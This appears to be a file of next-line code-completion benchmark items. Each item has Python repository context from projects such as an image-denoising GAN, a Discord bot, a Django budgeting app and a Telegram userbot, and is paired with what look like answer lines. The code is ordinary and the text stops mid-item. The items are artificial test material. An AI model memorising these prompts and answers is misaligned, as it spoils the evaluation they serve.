| user_name = get_user_name() |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: YoungJooHan/NM-FlowGAN
# Path: util/util.py
def tensor2np(t:torch.Tensor):
'''
transform torch Tensor to numpy having opencv image form.
RGB -> BGR
(c,h,w) -> (h,w,c)
'''
t = t.cpu().detach()
# gray
if len(t.shape) == 2:
return t.permute(1,2,0).numpy()
# RGB -> BGR
elif len(t.shape) == 3:
return np.flip(t.permute(1,2,0).numpy(), axis=2)
# image batch
elif len(t.shape) == 4:
return np.flip(t.permute(0,2,3,1).numpy(), axis=3)
else:
raise RuntimeError('wrong tensor dimensions : %s'%(t.shape,))
# Path: util/util.py
def save_img(dir_name, file_name, img):
path = os.path.join(dir_name, file_name)
if 'raw' in path[-3:]:
os.makedirs(dir_name, exist_ok=True)
with open(path, 'w') as fid:
img.tofile(fid)
else:
if len(img.shape) == 3 and img.shape[-1] != 3 and img.shape[-1] > 1:
cv2.imwritemulti(path, img.transpose([2,0,1])) # multi stack image, convert to CHW
elif len(img.shape) == 4 and img.shape[0] > 1: # batch image, only grey image is available
img = img.squeeze(-1)
cv2.imwritemulti(path, img)
elif len(img.shape) == 4 and img.shape[0] <= 1: # single batch image
img = img.squeeze(0)
cv2.imwrite(path, img)
else:
cv2.imwrite(path, img)
# Path: util/file_manager.py
import os
import cv2
import numpy as np
import torch
from .util import tensor2np, save_img
class FileManager:
def __init__(self, session_name, output_path=None):
if output_path is None:
self.output_folder = "./output"
else:
self.output_folder = output_path
if not os.path.isdir(self.output_folder):
os.makedirs(self.output_folder)
print("[WARNING] output folder is not exist, create new one")
# init session
self.session_name = session_name
os.makedirs(os.path.join(self.output_folder, self.session_name), exist_ok=True)
# mkdir
for directory in ['checkpoint', 'img']:
self.make_dir(directory)
def is_dir_exist(self, dir_name:str) -> bool:
return os.path.isdir(os.path.join(self.output_folder, self.session_name, dir_name))
def make_dir(self, dir_name:str) -> str:
os.makedirs(os.path.join(self.output_folder, self.session_name, dir_name), exist_ok=True)
def get_dir(self, dir_name:str) -> str:
# -> './output/<session_name>/dir_name'
return os.path.join(self.output_folder, self.session_name, dir_name)
def save_img_tensor(self, dir_name:str, file_name:str, img:torch.Tensor, ext='png'):
self.save_img_numpy(dir_name, file_name, tensor2np(img), ext)
def save_img_numpy(self, dir_name:str, file_name:str, img:np.array, ext='png'):
if np.shape(img)[2] == 1:
| save_img(self.get_dir(dir_name), '%s.%s'%(file_name, ext), np.squeeze(img, 2)) |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: VCasecnikovs/RAGAgainstTheMachine
# Path: chatting.py
def chat_inference(
messages: list[ChatMessage],
client: OpenAI,
model="gpt-4-1106-preview",
):
formatted_messages = []
for message in messages:
formatted_messages.append(
{
"role": message.role,
"content": message.content,
}
)
completion = client.chat.completions.create(
response_format={"type": "json_object"},
model=model,
messages=[
*formatted_messages,
],
)
model_answer = completion.choices[0].message.content
return model_answer
# Path: chatting.py
class ChatMessage(BaseModel):
role: Role
content: str
# Path: chatting.py
def get_openAI_client():
load_dotenv()
client = OpenAI()
return client
# Path: chatting.py
class Role(str, Enum):
SYSTEM = "system"
USER = "user"
ASSISTANT = "assistant"
# Path: sourcing.py
import requests
import os
import json
from dotenv import load_dotenv
from newspaper import Article
from chatting import chat_inference, ChatMessage, get_openAI_client, Role
YOU_HEADERS = {"X-API-Key": os.environ.get("YOUCOM_API_KEY", "")}
def _get_you_search_impl(
query: str, page_index: int = 0, limit: int = 20, country: str = ""
):
url = "https://api.ydc-index.io/search"
query_args = {"query": query}
if page_index:
query_args["offset"] = page_index
if limit:
query_args["count"] = limit
if country:
query_args["country"] = country
response = requests.request("GET", url, headers=YOU_HEADERS, params=query_args)
results = []
for line in response.json()["hits"]:
snippets = " ".join(line["snippets"])
description = ". ".join([line["title"], snippets])
results.append(
{
"url": line["url"],
"title": line["title"],
"text": description,
}
)
return results
def _get_you_news_impl(
query: str, page_index: int = 0, limit: int = 20, country: str = ""
):
url = "https://api.ydc-index.io/news"
query_args = {"q": query}
if page_index:
query_args["offset"] = page_index
if limit:
query_args["count"] = limit
if country:
query_args["country"] = country
response = requests.request("GET", url, headers=YOU_HEADERS, params=query_args)
results = []
for line in response.json()["news"]["results"]:
results.append(
{"url": line["url"], "title": line["title"], "text": line["description"]}
)
return results
def get_you_search(query: str):
# TODO: pass the page here somehow
return _get_you_search_impl(query, page_index=0, country="")
def get_you_news(query: str):
# TODO: pass the page here somehow
results = []
for _ in range(1):
results.extend(_get_you_news_impl(query, page_index=0, country=""))
return results
def _get_newsapi_impl(
query: str, page_index: int = 0, limit: int = 20
):
url = "https://newsapi.org/v2/everything"
query_args = {
"q": query,
"apiKey": os.environ.get("NEWSAPI_API_KEY")
}
if page_index:
query_args["page"] = page_index+1
if limit:
query_args["pageSize"] = limit
response = requests.request("GET", url, params=query_args)
results = []
for line in response.json()["articles"]:
results.append(
{"url": line["url"], "title": line["title"], "text": line["description"] + " " + line["content"]}
)
return results
def get_newsapi_news(query: str):
results = []
for _ in range(1):
results.extend(_get_newsapi_impl(query, page_index=0))
return results
SOURCES = {
"you_news": get_you_news,
# "you_search": get_you_search,
# "news_api": get_newsapi_news,
}
def get_page_text(url: str) -> str:
try:
article = Article(url)
article.download()
article.parse()
return article.text
except Exception:
return ""
def scrape_data(articles_data: list[dict]):
for article in articles_data:
parsed_text = get_page_text(article["url"])
if parsed_text:
article["text"] = article["text"] + " ." + parsed_text
def filter_urls(urls):
| client = get_openAI_client() |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: TimeEnjoyed/TimeBot
# Path: core/config.py
# Path: core/constants.py
MBTI_TYPES: list[str] = [
"ESTP",
"ESTJ",
"ESFP",
"ESFJ",
"ISTP",
"ISTJ",
"ISFP",
"ISFJ",
"ENFJ",
"ENTP",
"ENFP",
"ENTJ",
"INTP",
"INFJ",
"INTJ",
"INFP",
]
# Path: core/bots.py
import asyncio
import json
import logging
import pathlib
import aiohttp
import discord
import twitchio
import wavelink
from typing import TYPE_CHECKING
from urllib.parse import quote
from discord.ext import commands
from twitchio.ext import commands as tcommands
from .config import config
from .constants import MBTI_TYPES
from collections.abc import Sequence
from typing import Any
from database import Database
if TYPE_CHECKING:
logger: logging.Logger = logging.getLogger(__name__)
LIVE_ROLE_ID: int = 1182206699969458226
SUBBED_ROLE_ID: int = 873044115279990836
class DiscordBot(commands.Bot):
tbot: TwitchBot
def __init__(self, *, database: Database) -> None:
self.database = database
intents: discord.Intents = discord.Intents.default()
intents.message_content = True
intents.members = True
intents.presences = True
self.loaded: bool = False
super().__init__(intents=intents, command_prefix=config["DISCORD"]["prefix"])
async def on_ready(self) -> None:
if self.loaded:
return
self.loaded = True
assert self.user
logger.info(f"Logged into Discord as {self.user} | {self.user.id}")
if config["DEBUG"]["enabled"] is True:
return
guild: discord.Guild = self.get_guild(859565527343955998) # type: ignore
role: discord.Role = guild.get_role(LIVE_ROLE_ID) # type: ignore
subbed: discord.Role = guild.get_role(SUBBED_ROLE_ID) # type: ignore
for member in guild.members:
if subbed not in member.roles:
continue
streaming = False
for activity in member.activities:
if isinstance(activity, discord.Streaming) and str(activity.platform).lower() == "twitch":
streaming = True
if streaming and role not in member.roles:
await member.add_roles(role)
await asyncio.sleep(1)
elif not streaming and role in member.roles:
await member.remove_roles(role)
await asyncio.sleep(1)
logger.info("Finished updating roles in on_ready event.")
async def setup_hook(self) -> None:
node: wavelink.Node = wavelink.Node(uri=config["WAVELINK"]["uri"], password=config["WAVELINK"]["password"])
await wavelink.Pool.connect(nodes=[node], client=self, cache_capacity=100)
location = ("extensions/discord", "extensions.discord")
extensions: list[str] = [f"{location[1]}.{f.stem}" for f in pathlib.Path(location[0]).glob("*.py")]
for extension in extensions:
await self.load_extension(extension)
logger.info("Loaded extensions for Discord Bot.")
async def on_wavelink_node_ready(self, payload: wavelink.NodeReadyEventPayload) -> None:
node: wavelink.Node = payload.node
logger.info("Wavelink successfully connected: %s. Resumed: %s", node.identifier, payload.resumed)
async def on_command_error(self, context: commands.Context, exception: commands.CommandError) -> None:
if isinstance(exception, commands.CommandNotFound):
return
logger.exception(exception)
async def on_presence_update(self, before: discord.Member, after: discord.Member) -> None:
if config["DEBUG"]["enabled"] is True:
return
if before.guild.id != 859565527343955998:
return
subbed: discord.Role | None = after.guild.get_role(SUBBED_ROLE_ID)
if subbed not in after.roles:
return
bstream: discord.Streaming | None = None
astream: discord.Streaming | None = None
for activity in before.activities:
if isinstance(activity, discord.Streaming) and str(activity.platform).lower() == "twitch":
bstream = activity
for activity in after.activities:
if isinstance(activity, discord.Streaming) and str(activity.platform).lower() == "twitch":
astream = activity
if bstream is not None and astream is not None:
return
role: discord.Role = before.guild.get_role(LIVE_ROLE_ID) # type: ignore
if not bstream and astream and role not in before.roles:
await before.add_roles(role, reason="Started streaming on Twitch")
elif not astream and bstream and role in after.roles:
await after.remove_roles(role, reason="Stopped streaming on Twitch")
def mbti_count(self) -> dict[str, int]:
guild: discord.Guild | None = self.get_guild(859565527343955998)
assert guild is not None
roles: Sequence[discord.Role] = guild.roles
| mbti_dict: dict[str, int] = dict.fromkeys(MBTI_TYPES, 0) |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: henriquesebastiao/poupy
# Path: project/apps/app/forms.py
class TransferForm(forms.Form):
"""Form used to transfer money between accounts."""
description = forms.CharField(
label='Description',
widget=forms.TextInput(
attrs={'placeholder': 'Insert the description of transaction'}
),
)
account_origin = forms.ModelChoiceField(
queryset=Account.objects.all(),
label='Source account',
widget=forms.Select(),
)
account_destination = forms.ModelChoiceField(
queryset=Account.objects.all(),
label='Target account',
widget=forms.Select(),
)
value = forms.DecimalField(
label='Value',
widget=forms.NumberInput(
attrs={'placeholder': 'Insert the value of transaction'}
),
)
def clean(self):
"""Validates that the account_origin and account_destination fields are not equal"""
cleaned_data = super().clean()
account_origin = cleaned_data.get('account_origin')
account_destination = cleaned_data.get('account_destination')
if account_origin == account_destination:
raise ValidationError(
{
'account_destination': 'Source account and target account must be different.'
}
)
value = cleaned_data.get('value')
if value is None or value <= 0:
raise ValidationError(
{'value': 'Value must be greater than zero.'}
)
# Path: project/apps/app/models.py
class Account(CommonInfo):
"""Model for the Account."""
name = models.CharField(max_length=55, null=False)
balance = models.DecimalField(
decimal_places=2,
null=False,
default=0.00,
max_digits=14,
validators=[MinValueValidator(Decimal('0.00'))],
)
def __str__(self):
return self.name
# Path: project/apps/app/models.py
class Transfer(CommonInfo, TransactionMixin):
"""Model for the Transfer."""
account_origin = models.ForeignKey(
Account, on_delete=models.CASCADE, related_name='account_origin'
)
account_destination = models.ForeignKey(
Account, on_delete=models.CASCADE, related_name='account_destination'
)
type = models.CharField(max_length=8, default='TRANSFER', null=False)
def __str__(self):
return self.description
# Path: project/apps/app/views/transfer.py
from django.contrib import messages
from django.contrib.auth.mixins import LoginRequiredMixin
from django.shortcuts import redirect
from django.views.generic import FormView
from ..forms import TransferForm
from ..models import Account, Transfer
"""Views for transfer app."""
class TransferView(LoginRequiredMixin, FormView):
"""Transfer view page."""
login_url = 'login'
template_name = 'pages/app/new_transfer.html'
| form_class = TransferForm |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: AuroraNemoia/yuusei
# Path: utils.py
def log(text, type="normal"):
types = {
"quiet": "\x1b[33;90m",
"warn": "\x1b[33;20m⚠️ WARN: ",
"error": "\x1b[31;1m❌ ERROR: ",
"normal": "\x1b[33;0m"
}
print(types.get(type, types["normal"]) + text + "\x1b[0m")
# Path: utils.py
def basepath():
match platform:
case "windows":
return (os.path.abspath(__file__).rsplit('\\', 1)[0] + "\\").replace("\\", "/")
case _:
return os.path.dirname(os.path.abspath(__file__).rsplit('\\', 1)[0] + "\\").replace("\\", "/")
# Path: utils.py
def tokenize(text):
tokens = tokenizer.tokenize(text)
return len(tokens)
# Path: main.py
import requests
import json
import jstyleson
import os
import time
import random
import generate
import history
from utils import log, basepath, tokenize
# Constants
config = jstyleson.loads(open(basepath() + "/config.json", "r").read())
# Initialize self
self_name = config["personality"]["name"]
self_persona = config["personality"]["persona"]
self_instruct_pre = config["personality"]["pre"]
self_instruct_post = config["personality"]["post"]
use_chat_completions = config["settings"]["use_chat_completions"]
force_pre = config["settings"]["force_pre"]
# Have self reply to the current situation.
def answer():
# What is the current situation?
prompt = buildPrompt()
def buildPrompt():
# Build the prompt frontmatter.
if use_chat_completions == True or force_pre == True:
frontmatter = self_instruct_pre + self_persona + self_instruct_post
else: # When using TextCompletions, we do not need to instruct the model, the response prompt does it for us.
frontmatter = self_persona + self_instruct_post
frontmatter_length = tokenize(frontmatter)
# What is our budget for message history?
history_token_budget = config["settings"]["context_size"] - config["settings"]["max_new_tokens"] - frontmatter_length
# Let's query messages until we hit the token limit.
message_event_stack = []
# TODO: implement checking max_history_items
event_stack = history.fetchEvents(6)
token_length = 0
for event in event_stack:
if event["event_type"] == "message":
token_length += tokenize(event["content"])
if token_length > history_token_budget:
break
message_event_stack.append(event)
# Build the message stack as a string.
message_stack = ""
for message in message_event_stack:
message_stack += (message["name"] + ": " + message["content"] + "\n")
# Build response prompt (unused in ChatCompletions).
response_prompt = self_name + ": "
prompt = frontmatter + message_stack
if use_chat_completions == False:
prompt += response_prompt
| log(prompt) |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: gunyu1019/async-client-decorator
# Path: async_client_decorator/request.py
def request(
method: str,
path: str,
directly_response: bool = False,
header_parameter: list[str] = None,
query_parameter: list[str] = None,
form_parameter: list[str] = None,
path_parameter: list[str] = None,
body_parameter: Optional[str] = None,
response_parameter: list[str] = None,
**request_kwargs
):
"""A decoration for making request.
Create a HTTP client-request, when decorated function is called.
Parameters
----------
method: str
HTTP method (example. GET, POST)
path: str
Request path. Path connects to the base url.
directly_response: bool
Returns a `aiohttp.ClientResponse` without executing the function's body statement.
header_parameter: list[str]
Function parameter names used in the header
query_parameter: list[str]
Function parameter names used in the query(parameter)
form_parameter: list[str]
Function parameter names used in body form.
path_parameter: list[str]
Function parameter names used in the path.
body_parameter: str
Function parameter name used in the body.
The body parameter must take only dict, list, or aiohttp.FormData.
response_parameter: list[str]
Function parameter name to store the HTTP result in.
**request_kwargs
Warnings
--------
Form_parameter and Body Parameter can only be used with one or the other.
"""
return _request(
lambda self, _path, **kwargs: self.request(method, _path, **kwargs),
path,
directly_response,
header_parameter,
query_parameter,
form_parameter,
path_parameter,
body_parameter,
response_parameter,
**request_kwargs
)
# Path: async_client_decorator/query.py
class Query:
"""This class is used when a function's parameters are used as query in an HTTP request.
Examples
--------
>>> def function(query: str | Query):
... pass
"""
DEFAULT_KEY = "__DEFAULT_QUERY__"
@staticmethod
def default_query(key: str, value: Any):
def decorator(func):
if not hasattr(func, Query.DEFAULT_KEY):
setattr(func, Query.DEFAULT_KEY, dict())
getattr(func, Query.DEFAULT_KEY)[key] = value
return func
return decorator
# Path: async_client_decorator/session.py
class Session:
"""A class to manage session for managing decoration functions."""
def __init__(self, base_url: str, directly_response: bool = False, **kwargs):
self.directly_response = directly_response
self.base_url = base_url
self.session = aiohttp.ClientSession(self.base_url, **kwargs)
@property
def closed(self) -> bool:
return self.session.closed
async def close(self):
return await self.session.close()
async def request(self, method: str, path: str, **kwargs):
return await self.session.request(method, path, **kwargs)
async def get(self, path: str, **kwargs):
return await self.session.get(path, **kwargs)
async def post(self, path: str, **kwargs):
return await self.session.post(path, **kwargs)
async def options(self, path: str, **kwargs):
return await self.session.options(path, **kwargs)
async def delete(self, path: str, **kwargs):
return await self.session.delete(path, **kwargs)
@classmethod
def single_session(
cls, base_url: str, loop: asyncio.AbstractEventLoop = None, **session_kwargs
):
"""A single session for one request.
Parameters
----------
base_url: str
base url of the API. (for example, https://api.yhs.kr)
loop: asyncio.AbstractEventLoop
[event loop](https://docs.python.org/3/library/asyncio-eventloop.html#asyncio-event-loop) used for processing HTTP requests.
Examples
--------
The session is defined through the function's decoration.
>>> @Session.single_session("https://api.yhs.kr")
... @request("GET", "/bus/station")
... async def station_query(session: Session, name: Query | str) -> aiohttp.ClientResponse:
... pass
"""
def decorator(func: RequestFunction):
if not asyncio.iscoroutinefunction(func):
raise TypeError("function %s must be coroutine.".format(func.__name__))
@functools.wraps(func)
async def wrapper(*args, **kwargs):
client = cls(base_url, loop, **session_kwargs)
response = await func(client, *args, **kwargs)
if not client.closed:
await client.close()
return response
return wrapper
return decorator
# Path: example/single_session.py
import asyncio
import aiohttp
from typing import NamedTuple
from async_client_decorator import request, Session, Query
loop = asyncio.get_event_loop()
class StationInfo(NamedTuple):
displayId: str
id: str
name: str
posX: float
posY: float
stationId: str
type: int
| @Session.single_session("https://api.yhs.kr") |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: pmutua/CodeCraftGPT
# Path: data/programming_languages.py
PROGRAMMING_LANGUAGES = (
"Python", "JavaScript", "Java", "C++", "C#", "Ruby", "Swift", "Go", "PHP", "Rust", "VB.net",
"Kotlin", "TypeScript", "Scala", "Haskell", "Perl", "Objective-C", "Dart", "R", "Groovy",
"Elixir", "Lua", "Julia", "Shell", "HTML", "CSS", "SQL", "MATLAB", "CoffeeScript", "F#",
"Clojure", "Assembly", "Lisp", "Cobol", "Fortran", "Racket", "Ada", "Prolog"
)
# Path: prompts/translate_code_prompt.py
def create_translation_prompt(target_language, source_code):
"""
Create a chat prompt for a code translation task.
Parameters:
- target_language (str): The language to which the code should be translated.
- source_code (str): The source code that needs to be translated.
Returns:
langchain.chat_models.ChatPromptTemplate: The generated chat prompt template.
"""
system_template = "You are a code translator. Your task is to translate the given source code to {target_language}."
system_message_prompt = SystemMessagePromptTemplate.from_template(system_template)
human_template = "Please translate the following source code to {target_language}: '{source_code}'."
human_message_prompt = HumanMessagePromptTemplate.from_template(human_template)
chat_prompt = ChatPromptTemplate.from_messages([system_message_prompt, human_message_prompt])
return chat_prompt
# Path: components/lang_page.py
from typing import Type
from langchain.chains import LLMChain
from langchain.chat_models import ChatOpenAI
from data.programming_languages import PROGRAMMING_LANGUAGES
from prompts.translate_code_prompt import create_translation_prompt
import streamlit as st
"""
LangLink - Code Translation and Cross-Language Compatibility
Overcome language barriers with LangLink, an AI-powered tool facilitating smooth code translation
between programming languages. Developers can confidently migrate codebases, ensuring compatibility
and seamless transitions across different languages.
"""
def show_lang_page(chat: Type[ChatOpenAI]):
"""
Displays the LangLink page for code translation.
Parameters:
- openai_api_key (str): The API key for OpenAI.
Returns:
None
"""
st.title("LangLink - Code Translation and Cross-Language Compatibility")
st.markdown('Overcome language barriers with LangLink, an AI-powered tool facilitating smooth '
'code translation between programming languages. Developers can confidently migrate '
'codebases, ensuring compatibility and seamless transitions across different languages.')
with st.form(key="lang_form"):
source_code = st.text_area("Enter source code")
target_language = st.selectbox("Select programming language", PROGRAMMING_LANGUAGES)
submit_button = st.form_submit_button(label='Submit')
if submit_button:
st.text(f"Translating code snippet to {target_language}................✨")
| chat_prompt = create_translation_prompt(target_language,source_code) |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: itzshukla/STRANGER-USERBOT2.0
# Path: Zaid/database/pmpermitdb.py
async def get_approved_users():
results = await collection.find_one({"_id": "Approved"})
if results:
return results["users"]
else:
return []
# Path: Zaid/database/pmpermitdb.py
async def pm_guard():
result = await collection.find_one({"_id": 1})
if not result:
return False
if not result["pmpermit"]:
return False
else:
return True
# Path: config.py
LOG_GROUP = getenv("LOG_GROUP")
# Path: config.py
PM_LOGGER = getenv("PM_LOGGER")
# Path: Zaid/modules/private/pmguard.py
from pyrogram import filters, Client
from pyrogram.types import Message
from pyrogram.methods import messages
from Zaid.database.pmpermitdb import get_approved_users, pm_guard
from config import LOG_GROUP, PM_LOGGER
import asyncio
import Zaid.database.pmpermitdb as Zaid
FLOOD_CTRL = 0
ALLOWED = []
USERS_AND_WARNS = {}
async def denied_users(filter, client: Client, message: Message):
if not await pm_guard():
return False
if message.chat.id in (await get_approved_users()):
return False
else:
return True
def get_arg(message):
msg = message.text
msg = msg.replace(" ", "", 1) if msg[1] == " " else msg
split = msg[1:].replace("\n", " \n").split(" ")
if " ".join(split[1:]).strip() == "":
return ""
return " ".join(split[1:])
@Client.on_message(filters.command("setlimit", ["."]) & filters.me)
async def pmguard(client, message):
arg = get_arg(message)
if not arg:
await message.edit("**Set limit to what?**")
return
await Zaid.set_limit(int(arg))
await message.edit(f"**Limit set to {arg}**")
@Client.on_message(filters.command("setblockmsg", ["."]) & filters.me)
async def setpmmsg(client, message):
arg = get_arg(message)
if not arg:
await message.edit("**What message to set**")
return
if arg == "default":
await Zaid.set_block_message(Zaid.BLOCKED)
await message.edit("**Block message set to default**.")
return
await Zaid.set_block_message(f"`{arg}`")
await message.edit("**Custom block message set**")
@Client.on_message(filters.command(["allow", "ap", "approve", "a"], ["."]) & filters.me & filters.private)
async def allow(client, message):
chat_id = message.chat.id
pmpermit, pm_message, limit, block_message = await Zaid.get_pm_settings()
await Zaid.allow_user(chat_id)
await message.edit(f"**I have allowed [you](tg://user?id={chat_id}) to PM me.**")
async for message in client.search_messages(
chat_id=message.chat.id, query=pm_message, limit=1, from_user="me"
):
await message.delete()
USERS_AND_WARNS.update({chat_id: 0})
@Client.on_message(filters.command(["deny", "dap", "disapprove", "dapp"], ["."]) & filters.me & filters.private)
async def deny(client, message):
chat_id = message.chat.id
await Zaid.deny_user(chat_id)
await message.edit(f"**I have denied [you](tg://user?id={chat_id}) to PM me.**")
@Client.on_message(
filters.private
& filters.create(denied_users)
& filters.incoming
& ~filters.service
& ~filters.me
& ~filters.bot
)
async def reply_pm(app: Client, message):
global FLOOD_CTRL
pmpermit, pm_message, limit, block_message = await Zaid.get_pm_settings()
user = message.from_user.id
user_warns = 0 if user not in USERS_AND_WARNS else USERS_AND_WARNS[user]
| if PM_LOGGER: |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: UWNetworksLab/adn-compiler
# Path: compiler/element/logger.py
ELEMENT_LOG = logging.getLogger("ir")
# Path: compiler/element/node.py
class Expr(Node):
def __init__(self, lhs: Expr, op: Operator, rhs: Expr):
self.lhs = lhs
self.op = op
self.rhs = rhs
self.type = "unknown"
# Path: compiler/element/node.py
class Identifier(Node):
def __init__(self, name: str):
self.name = name
# Path: compiler/element/node.py
class Internal(Node):
def __init__(
self,
internal: List[
Tuple[
Identifier,
Type,
ConsistencyDecorator,
CombinerDecorator,
PersistenceDecorator,
]
],
):
self.internal = internal
# Path: compiler/element/node.py
class MethodCall(Expr):
def __init__(self, obj: Identifier, method: MethodType, args: List[Expr]):
self.obj = obj
self.method = method
self.args = args
# Path: compiler/element/node.py
class Procedure(Node):
def __init__(self, name: str, params: List[Identifier], body: List[Statement]):
self.name = name
self.params = params
self.body = body
# Path: compiler/element/visitor.py
class Visitor(ABC):
def visitNode(self, node: Node, ctx):
raise Exception(f"visit function for {node.__class__.__name__} not implemented")
def visitProgram(self, node: Program, ctx):
return self.visitNode(node)
def visitInternal(self, node: Internal, ctx):
return self.visitNode(node)
def visitProcedure(self, node: Procedure, ctx):
return self.visitNode(node)
def visitStatement(self, node: Statement, ctx):
return self.visitNode(node)
def visitMatch(self, node: Match, ctx):
return self.visitNode(node)
def visitAssign(self, node: Assign, ctx):
return self.visitNode(node)
def visitPattern(self, node: Pattern, ctx):
return self.visitNode(node)
def visitExpr(self, node: Expr, ctx):
return self.visitNode(node)
def visitIdentifier(self, node: Identifier, ctx):
return self.visitNode(node)
def visitFuncCall(self, node: FuncCall, ctx):
return self.visitNode(node)
def visitMethodCall(self, node: MethodCall, ctx):
return self.visitNode(node)
def visitSend(self, node: Send, ctx):
return self.visitNode(node)
def visitLiteral(self, node: Literal, ctx):
return self.visitNode(node)
# Path: compiler/element/optimize/consolidate.py
from copy import deepcopy
from typing import Callable, Dict, List, Optional, Protocol, Sequence, Tuple, TypeVar
from compiler.element.logger import ELEMENT_LOG as LOG
from compiler.element.node import *
from compiler.element.node import Expr, Identifier, Internal, MethodCall, Procedure
from compiler.element.visitor import Visitor
def consolidate(irs: List[Program]) -> Program:
while len(irs) > 1:
left = irs.pop(0)
right = irs.pop(0)
new_prog = Program(
Internal([]),
Procedure("init", [], []),
Procedure("req", [], []),
Procedure("resp", [], []),
)
new_prog.definition.internal = deepcopy(
left.definition.internal + right.definition.internal
)
InitConsolidator().visitProcedure(new_prog.init, (left.init, right.init))
ProcedureConsolidator().visitProcedure(
new_prog.req, (deepcopy(left.req), deepcopy(right.req))
)
ProcedureConsolidator().visitProcedure(
new_prog.resp, (deepcopy(right.resp), deepcopy(left.resp))
)
irs.append(new_prog)
return irs[0]
class InitConsolidator(Visitor):
def __init__(self):
pass
def visitNode(self, node: Node, ctx) -> str:
| LOG.error("InitConsolidator: visitNode not implemented") |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: sunholo-data/sunholo-py
# Path: sunholo/logging.py
def setup_logging(self, log_level=logging.INFO, logger_name=None):
if log_level:
self.log_level = log_level
if logger_name:
self.logger_name = logger_name
try:
caller_info = self._get_caller_info()
if not is_running_on_gcp():
logging.basicConfig(level=self.log_level, format='%(asctime)s - %(levelname)s - %(message)s')
logging.info(f"Standard logging: {caller_info['file']}")
return logging
print(f"Cloud logging for {caller_info['file']}")
self.client.setup_logging(log_level=self.log_level)
return self # Return the instance itself on success
except Exception as e:
# If there's an exception, use standard Python logging as a fallback
logging.basicConfig(level=self.log_level, format='%(asctime)s - %(levelname)s - %(message)s')
logging.warning(f"Failed to set up Google Cloud Logging. Using standard logging. Error: {e}")
return logging
# Path: sunholo/utils/config.py
def load_config_key(key: str, vector_name: str, filename: str=None) -> str:
from ..logging import setup_logging
logging = setup_logging()
assert isinstance(key, str), f"key must be a string got a {type(key)}"
assert isinstance(vector_name, str), f"vector_name must be a string, got a {type(vector_name)}"
config, filename = load_config(filename)
logging.info(f"Fetching {key} for {vector_name}")
llm_config = config.get(vector_name, None)
if llm_config is None:
raise ValueError(f"No config array was found for {vector_name} in {filename}")
logging.info(f'llm_config: {llm_config} for {vector_name} - fetching "{key}"')
key_value = llm_config.get(key, None)
return key_value
# Path: sunholo/utils/config.py
def load_config(filename: str=None) -> (dict, str):
from ..logging import setup_logging
logging = setup_logging()
if filename is None:
filename = os.getenv("_CONFIG_FILE", None)
if filename is None:
raise ValueError("No _CONFIG_FILE env value specified")
# Join the script directory with the filename
config_path = filename
logging.info(f"Loading config file {os.getcwd()}/{config_path}")
with open(config_path, 'r') as f:
if filename.endswith(".json"):
config = json.load(f)
elif filename.endswith(".yaml") or filename.endswith(".yml"):
config = yaml.safe_load(f)
else:
raise ValueError(f"Unsupported config file format: {config_path}. The supported formats are JSON and YAML.")
return config, filename
# Path: sunholo/utils/config.py
def get_module_filepath(filepath):
from ..logging import setup_logging
logging = setup_logging()
# Get the root directory of this Python script
dir_path = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
# Build the full filepath by joining the directory with the filename
filepath = os.path.join(dir_path, filepath)
logging.info(f"Found filepath {filepath}")
return filepath
# Path: sunholo/components/llm.py
from ..logging import setup_logging
from ..utils.config import load_config_key, load_config, get_module_filepath
from langchain.chat_models import ChatOpenAI
from langchain.llms import VertexAI
from langchain.llms import VertexAI
from ..patches.langchain.vertexai import VertexAIModelGarden
from langchain.chat_models import ChatOpenAI
from langchain.chat_models import ChatVertexAI
from langchain.chat_models import ChatVertexAI
from langchain_google_genai import ChatGoogleGenerativeAI
from langchain.embeddings import OpenAIEmbeddings
from langchain.embeddings import VertexAIEmbeddings
from langchain_google_genai import GoogleGenerativeAIEmbeddings
# Copyright [2023] [Holosun ApS]
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
logging = setup_logging()
def pick_llm(vector_name):
logging.debug('Picking llm')
| llm_str = load_config_key("llm", vector_name, filename = "config/llm_config.yaml") |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: atlantic-quantum/Shipyard
# Path: shipyard/passes/semantic_analysis/scoped_symbol_table.py
class ScopedSymbolTable:
